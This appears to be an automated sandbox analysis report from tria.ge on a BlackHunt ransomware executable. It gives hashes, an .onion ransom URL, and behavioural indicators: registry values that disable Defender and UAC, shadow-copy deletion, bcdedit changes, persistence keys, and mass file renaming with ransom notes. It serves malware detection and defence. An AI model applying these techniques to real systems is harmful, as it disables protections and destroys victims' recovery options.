Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:05
Static task
static1
Behavioral task
behavioral1
Sample
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource
win10v2004-20231215-en
General
-
Target
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
-
Size
707KB
-
MD5
7872e09ba0a15441604e90545b04aab7
-
SHA1
c501ee9736dae19a046715f114e1ac7baf287f2f
-
SHA256
8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f
-
SHA512
4304de6648353dc7c4dc5a906e53e66d17018b69d6ffceb9718455288d71fb9237de6ca9755a41d892522f003c8751939c860cdfa54765915c765dd7492bb60a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Qvnh:6uaTmkZJ+naie5OTamgEoKxLW7Oh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2072 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2752 bcdedit.exe 1860 bcdedit.exe -
Renames multiple (2363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2228 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\B: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\U: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\O: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\G: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\H: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\N: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Y: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\X: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Q: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\S: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\L: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\V: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\M: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\E: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\R: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\P: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\A: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\J: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\K: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened (read-only) \??\Z: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-uihandler.xml_hidden 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_Private.key 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.txt 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#BlackHunt_ReadMe.hta 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2896 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1508 vssadmin.exe 2276 vssadmin.exe 1812 vssadmin.exe 2184 vssadmin.exe 864 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeRestorePrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeBackupPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeTakeOwnershipPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeAuditPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeSecurityPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeIncBasePriorityPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe Token: SeBackupPrivilege 1932 vssvc.exe Token: SeRestorePrivilege 1932 vssvc.exe Token: SeAuditPrivilege 1932 vssvc.exe Token: SeBackupPrivilege 2644 wbengine.exe Token: SeRestorePrivilege 2644 wbengine.exe Token: SeSecurityPrivilege 2644 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3000 wrote to memory of 604 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 31 PID 3000 wrote to memory of 604 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 31 PID 3000 wrote to memory of 604 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 31 PID 3000 wrote to memory of 604 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 31 PID 3000 wrote to memory of 2660 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 30 PID 3000 wrote to memory of 2660 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 30 PID 3000 wrote to memory of 2660 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 30 PID 3000 wrote to memory of 2660 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 30 PID 3000 wrote to memory of 2100 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 34 PID 3000 wrote to memory of 2100 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 34 PID 3000 wrote to memory of 2100 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 34 PID 3000 wrote to memory of 2100 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 34 PID 604 wrote to memory of 2768 604 cmd.exe 33 PID 604 wrote to memory of 2768 604 cmd.exe 33 PID 604 wrote to memory of 2768 604 cmd.exe 33 PID 3000 wrote to memory of 2308 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 36 PID 3000 wrote to memory of 2308 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 36 PID 3000 wrote to memory of 2308 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 36 PID 3000 wrote to memory of 2308 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 36 PID 2660 wrote to memory of 2192 2660 cmd.exe 38 PID 2660 wrote to memory of 2192 2660 cmd.exe 38 PID 2660 wrote to memory of 2192 2660 cmd.exe 38 PID 3000 wrote to memory of 2720 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 39 PID 3000 wrote to memory of 2720 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 39 PID 3000 wrote to memory of 2720 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 39 PID 3000 wrote to memory of 2720 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 39 PID 3000 wrote to memory of 2728 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 40 PID 3000 wrote to memory of 2728 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 40 PID 3000 wrote to memory of 2728 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 40 PID 3000 wrote to memory of 2728 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 40 PID 3000 wrote to memory of 2860 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 42 PID 3000 wrote to memory of 2860 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 42 PID 3000 wrote to memory of 2860 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 42 PID 3000 wrote to memory of 2860 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 42 PID 2100 wrote to memory of 2888 2100 cmd.exe 44 PID 2100 wrote to memory of 2888 2100 cmd.exe 44 PID 2100 wrote to memory of 2888 2100 cmd.exe 44 PID 3000 wrote to memory of 2852 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 45 PID 3000 wrote to memory of 2852 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 45 PID 3000 wrote to memory of 2852 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 45 PID 3000 wrote to memory of 2852 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 45 PID 3000 wrote to memory of 2940 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 46 PID 3000 wrote to memory of 2940 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 46 PID 3000 wrote to memory of 2940 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 46 PID 3000 wrote to memory of 2940 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 46 PID 3000 wrote to memory of 2872 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 50 PID 3000 wrote to memory of 2872 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 50 PID 3000 wrote to memory of 2872 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 50 PID 3000 wrote to memory of 2872 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 50 PID 2308 wrote to memory of 2892 2308 cmd.exe 48 PID 2308 wrote to memory of 2892 2308 cmd.exe 48 PID 2308 wrote to memory of 2892 2308 cmd.exe 48 PID 3000 wrote to memory of 2140 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 51 PID 3000 wrote to memory of 2140 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 51 PID 3000 wrote to memory of 2140 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 51 PID 3000 wrote to memory of 2140 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 51 PID 3000 wrote to memory of 2608 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 53 PID 3000 wrote to memory of 2608 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 53 PID 3000 wrote to memory of 2608 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 53 PID 3000 wrote to memory of 2608 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 53 PID 3000 wrote to memory of 2824 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 54 PID 3000 wrote to memory of 2824 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 54 PID 3000 wrote to memory of 2824 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 54 PID 3000 wrote to memory of 2824 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe 54 -
